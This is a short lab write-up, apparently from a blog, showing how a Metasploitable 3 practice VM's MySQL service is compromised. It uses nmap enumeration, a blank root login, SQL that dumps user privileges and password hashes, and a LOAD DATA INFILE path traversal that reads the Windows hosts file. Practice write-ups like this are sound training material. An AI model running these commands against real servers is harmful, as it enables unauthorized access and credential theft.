Metasploitable 3 — MySQL Blank Creds and Local File Read
Everybody loves a database until it gets pwned with two commands by your local script kiddie. Let’s work on the Metasploitable 3, Windows Server 2008 VM once again to kick off some practice.
Enumeration
With no hesitation, we’re launching all of nmap’s mysql enumeration scripts to gain as much information about the target system
nmap -Pn -p3306 --script=mysql-* TARGETIP -v
Blank root Password
From this command we have gotten “root:<empty> — Valid credentials” from the mysql-enum nmap script.
Let’s connect to the mysql service on the Metasploitable 3 system from here. It was also noted that we had to disable SSL to be able to connect.
mysql -u root -h TARGETIP -p --ssl=FALSE
MySQL User Enumeration
# Get current user (an all users) privileges and hashes
use mysql;
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
SELECT * FROM mysql.user;
Local File Read
# Reading local files on the target system
use test;
CREATE TABLE test (text VARCHAR(100));
Query OK, 0 rows affected (0.230 sec)
LOAD DATA INFILE '../../../../../../../../../\\Windows\\System32\\drivers\\etc\\hosts' INTO TABLE test FIELDS TERMINATED BY '\n';
Query OK, 23 rows affected (0.163 sec)
Records: 23 Deleted: 0 Skipped: 0 Warnings: 0
select * from test;
We were then able to escape my “c:\wamp\bin\mysql\mysql5.5.20\” directory on the target system to read the hosts file.
How further would you go?
Happy Hacking XD!